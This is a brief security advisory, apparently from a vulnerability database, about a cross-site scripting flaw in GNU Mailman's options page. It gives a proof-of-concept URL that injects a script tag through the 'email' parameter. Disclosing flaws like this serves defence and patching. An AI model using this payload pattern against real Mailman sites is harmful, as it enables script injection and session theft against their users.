• info
• discussion
• exploit
• solution
• references

GNU Mailman 'email' Cross Site Scripting Vulnerability

The following proof of concept has been made available:

https://www.yourserver.com:443/mailman/options/yourlist?
language=en&email=<SCRIPT>alert('Can%20Cross%20Site%20Attack')</SCRIPT>